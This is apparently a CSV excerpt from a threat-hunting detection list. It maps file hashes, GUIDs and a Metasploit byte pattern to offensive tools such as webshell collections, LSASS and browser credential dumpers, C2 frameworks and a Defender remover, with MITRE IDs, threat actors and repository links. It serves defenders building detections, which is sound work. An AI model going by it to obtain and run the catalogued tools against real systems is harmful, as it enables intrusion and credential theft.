"*41d38b945928ee53bd8b1f3b230ecf3101f6c2249d1ec4d3d920a163045373b8*",".{0,1000}41d38b945928ee53bd8b1f3b230ecf3101f6c2249d1ec4d3d920a163045373b8.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","25452"
"*41dc2afeaea216cd8e1f2fdd3974b2bc80fe0df8e909f9ab7bfea34979bd6a0d*",".{0,1000}41dc2afeaea216cd8e1f2fdd3974b2bc80fe0df8e909f9ab7bfea34979bd6a0d.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","25454"
"*41ee1cd6256819570f05de5815f4cfe6dab88e30cf25ccd5f52bcb948e16e70c*",".{0,1000}41ee1cd6256819570f05de5815f4cfe6dab88e30cf25ccd5f52bcb948e16e70c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25457"
"*41efb031f13c00affa750865d6d2bf965ccf2ded9a50c40a5ba628b97ee0cb12*",".{0,1000}41efb031f13c00affa750865d6d2bf965ccf2ded9a50c40a5ba628b97ee0cb12.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25458"
"*41f73755bc80ff028571e3496dd851447cc69f428045223deb717173e5c44e69*",".{0,1000}41f73755bc80ff028571e3496dd851447cc69f428045223deb717173e5c44e69.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","#filehash","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","25460"
"*41fe9889b428813cda89d017204555e013cf5c081122cd821f6c343ccc2ffcb7*",".{0,1000}41fe9889b428813cda89d017204555e013cf5c081122cd821f6c343ccc2ffcb7.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","25461"
"*42 3C 8B AC 10 88 00 00 00 44 8B 54 15 20 44 8B 5C 15 24 4C*",".{0,1000}42\s3C\s8B\sAC\s10\s88\s00\s00\s00\s44\s8B\s54\s15\s20\s44\s8B\s5C\s15\s24\s4C.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","#content","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","25462"
"*4201ced96159133a8d586be95533b285798a60e2ebd6cc3f391be1eb91c83fa2*",".{0,1000}4201ced96159133a8d586be95533b285798a60e2ebd6cc3f391be1eb91c83fa2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25463"
"*4201d17c29662716ec98a94352ad59fbc96984e2ba7ee4878363642760da7bd3*",".{0,1000}4201d17c29662716ec98a94352ad59fbc96984e2ba7ee4878363642760da7bd3.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25464"
"*420809c2672f7197f17c6aa6cd1530d6b703f76a413a6de4e0d1538fdd2cceeb*",".{0,1000}420809c2672f7197f17c6aa6cd1530d6b703f76a413a6de4e0d1538fdd2cceeb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25465"
"*420e9c27a22ad9c6cb1535009bc23440b7a54fbef61d30e0702926e6a03502d3*",".{0,1000}420e9c27a22ad9c6cb1535009bc23440b7a54fbef61d30e0702926e6a03502d3.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","25466"
"*423091502099d1c9adba971a42db7801b2e856c1fd5bed6f1ca70d0e39ca1a94*",".{0,1000}423091502099d1c9adba971a42db7801b2e856c1fd5bed6f1ca70d0e39ca1a94.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#filehash","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","25469"
"*423fb953bce17ed5848e1fd48440846cb259a2981fb61906f94491d64e131728*",".{0,1000}423fb953bce17ed5848e1fd48440846cb259a2981fb61906f94491d64e131728.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25471"
"*4243bea295573ba62e1bf4b685804539bab0286331a11e390f7e46abdc8ee785*",".{0,1000}4243bea295573ba62e1bf4b685804539bab0286331a11e390f7e46abdc8ee785.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","25473"
"*424B81BE-2FAC-419F-B4BC-00CCBE38491F*",".{0,1000}424B81BE\-2FAC\-419F\-B4BC\-00CCBE38491F.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","25474"
"*42528d08f25fcba2cb6088f4a1d810a1c1783ee3af573204094f81c2a4c0765c*",".{0,1000}42528d08f25fcba2cb6088f4a1d810a1c1783ee3af573204094f81c2a4c0765c.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","25475"
"*42560ffa5cc3bf26dd9cf38c0bc8e2dbf853646128af8ca713e579023ff42ada*",".{0,1000}42560ffa5cc3bf26dd9cf38c0bc8e2dbf853646128af8ca713e579023ff42ada.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25478"
"*42565c3d95ecec212407c937415035ad9beff85f000036ff05fd9c39022a57b7*",".{0,1000}42565c3d95ecec212407c937415035ad9beff85f000036ff05fd9c39022a57b7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25479"
"*425e044558eb1b4ee187d3b222aa1c0cc62d760322d9d13c18c2aa7a3204c50d*",".{0,1000}425e044558eb1b4ee187d3b222aa1c0cc62d760322d9d13c18c2aa7a3204c50d.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","25480"
"*425f2ddd85773aaf592043762f9132ef2173ef8ec2e69ce2d049d329dd9685b2*",".{0,1000}425f2ddd85773aaf592043762f9132ef2173ef8ec2e69ce2d049d329dd9685b2.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","25481"
"*425fe29b9c497a1ea8c67cd9fe06cdf257efdeb73a2ebcd091039a2ff92434cd*",".{0,1000}425fe29b9c497a1ea8c67cd9fe06cdf257efdeb73a2ebcd091039a2ff92434cd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25482"
"*4260354c3960e04e73b36289099665ce1cb839d1c56696639e782643c98dbe7b*",".{0,1000}4260354c3960e04e73b36289099665ce1cb839d1c56696639e782643c98dbe7b.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","25483"
"*4265bff36f0564344447d7c71a1119354e408c3acddff3bdb27c61e7dac354ab*",".{0,1000}4265bff36f0564344447d7c71a1119354e408c3acddff3bdb27c61e7dac354ab.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25485"
"*426ba2e010fea3c33ca7c28049d4ca4cb5a9ed3657fbdcb5e2749852b7c39002*",".{0,1000}426ba2e010fea3c33ca7c28049d4ca4cb5a9ed3657fbdcb5e2749852b7c39002.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25487"
"*426d4834e4c5f0551f0e5c9ec4778282eab7c51b54d34f7409fb95d1e538697e*",".{0,1000}426d4834e4c5f0551f0e5c9ec4778282eab7c51b54d34f7409fb95d1e538697e.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25488"
"*42751e43f472016665ac6fcccaae068dbbacd836665b11b187c025e45da439d2*",".{0,1000}42751e43f472016665ac6fcccaae068dbbacd836665b11b187c025e45da439d2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25490"
"*4278e1122672d9c4029ec7c7f3a0e5180d7ad34a24519e80059b8fc9c5ea4df2*",".{0,1000}4278e1122672d9c4029ec7c7f3a0e5180d7ad34a24519e80059b8fc9c5ea4df2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25492"
"*42792c009e76d5dadcc9fbefde5c21157ed86b874aa8513936eefd9c1e2c3a88*",".{0,1000}42792c009e76d5dadcc9fbefde5c21157ed86b874aa8513936eefd9c1e2c3a88.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","25493"
"*427a990d8ee64c640faa8e1be48637ef64ec300615686d4bf212503c7926e2d4*",".{0,1000}427a990d8ee64c640faa8e1be48637ef64ec300615686d4bf212503c7926e2d4.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","25494"
"*427fabcb0798815ea87800466f168023502fc0c12a17f45b40c078bac25fbac5*",".{0,1000}427fabcb0798815ea87800466f168023502fc0c12a17f45b40c078bac25fbac5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25497"
"*4280a088866261d65bcfb3409133327b35626000c4c5b838d50c0d650baa8a62*",".{0,1000}4280a088866261d65bcfb3409133327b35626000c4c5b838d50c0d650baa8a62.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","25498"
"*42914217da8d5f50f1eb540af6b49433fbfbe42f598bb4ecd162ef2c88d07f1f*",".{0,1000}42914217da8d5f50f1eb540af6b49433fbfbe42f598bb4ecd162ef2c88d07f1f.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#filehash","N/A","10","","N/A","","","","25500"
"*4291df077f27794311313530ae25457a0fbad23d402c789ed3336ace4b64150c*",".{0,1000}4291df077f27794311313530ae25457a0fbad23d402c789ed3336ace4b64150c.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","#filehash","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","25501"
"*42963db39280206317fca8b24f4f10baa9f6b2231cc150ac3c2ef6e4481bdc3c*",".{0,1000}42963db39280206317fca8b24f4f10baa9f6b2231cc150ac3c2ef6e4481bdc3c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25502"
"*429be1a6cfaedaf84394b9c8364ccbfc353788f2332d6143b0131d48d39eac22*",".{0,1000}429be1a6cfaedaf84394b9c8364ccbfc353788f2332d6143b0131d48d39eac22.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25506"
"*429ce1891bbe55f6b39e8c0b32ddeb392246f8b2186b32a348114965453a3f53*",".{0,1000}429ce1891bbe55f6b39e8c0b32ddeb392246f8b2186b32a348114965453a3f53.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25507"
"*42a1be47225d778ad55b6acccfe487239ddc6ee0cc5b5471038568dd2910811f*",".{0,1000}42a1be47225d778ad55b6acccfe487239ddc6ee0cc5b5471038568dd2910811f.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","25508"
"*42a8c91d6435ea450e9ad759489c603dd7ec731a28eb736ec818a21a964a2fee*",".{0,1000}42a8c91d6435ea450e9ad759489c603dd7ec731a28eb736ec818a21a964a2fee.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25510"
"*42b0df4d8c38bc8123175b5ef8c2157bee1bb1b714ea4514bf7e6e59d27679f7*",".{0,1000}42b0df4d8c38bc8123175b5ef8c2157bee1bb1b714ea4514bf7e6e59d27679f7.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25512"
"*42bb8ff889457f6d971aaaff1ccb6550c66bfab0af20c534664a03346a3a777b*",".{0,1000}42bb8ff889457f6d971aaaff1ccb6550c66bfab0af20c534664a03346a3a777b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25513"
"*42bca2c91d21644cc8743f9cf6c0ced70d4fb27b3575cde43629633d19bfd718*",".{0,1000}42bca2c91d21644cc8743f9cf6c0ced70d4fb27b3575cde43629633d19bfd718.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25514"
"*42bcc191d46a5c1e8fe0f153a2d5954e4c6ef26b5b07d8c132ddbf1e9671c2cc*",".{0,1000}42bcc191d46a5c1e8fe0f153a2d5954e4c6ef26b5b07d8c132ddbf1e9671c2cc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25515"
"*42BDEFC0-0BAE-43DF-97BB-C805ABFBD078*",".{0,1000}42BDEFC0\-0BAE\-43DF\-97BB\-C805ABFBD078.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","#GUIDproject","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","25516"
"*42c6d6eb1e991b9adbdb2ec6563530d9123bd02dbde27e2a547c25d9feb41473*",".{0,1000}42c6d6eb1e991b9adbdb2ec6563530d9123bd02dbde27e2a547c25d9feb41473.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25517"
"*42c8296e0f553026ef98c9c89a1a6a60613c990621b9f04cf925833eb0572446*",".{0,1000}42c8296e0f553026ef98c9c89a1a6a60613c990621b9f04cf925833eb0572446.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25518"
"*42c99aa68fec2ee65d35559eac9d40b572bd5870c59b28e1f76da076c7ac4636*",".{0,1000}42c99aa68fec2ee65d35559eac9d40b572bd5870c59b28e1f76da076c7ac4636.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25519"
"*42d19694b284a82d02a8662edb4db86c22122ea981ca36aced94c4ba67fff072*",".{0,1000}42d19694b284a82d02a8662edb4db86c22122ea981ca36aced94c4ba67fff072.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","25520"
"*42d7b0b5c7be5fd50091d36d37de388ea14f95e5ce4c1cff718ac16eacb5a952*",".{0,1000}42d7b0b5c7be5fd50091d36d37de388ea14f95e5ce4c1cff718ac16eacb5a952.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25521"
"*42d93b315b6016a420d76e3b99e46a1baa57636d30b26bc4c556a0c3b3d70a6b*",".{0,1000}42d93b315b6016a420d76e3b99e46a1baa57636d30b26bc4c556a0c3b3d70a6b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25522"
"*42dd027e9404976db7b50f3ba2885c133d1516f3cb03b2f1a715a26de79ad330*",".{0,1000}42dd027e9404976db7b50f3ba2885c133d1516f3cb03b2f1a715a26de79ad330.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25523"
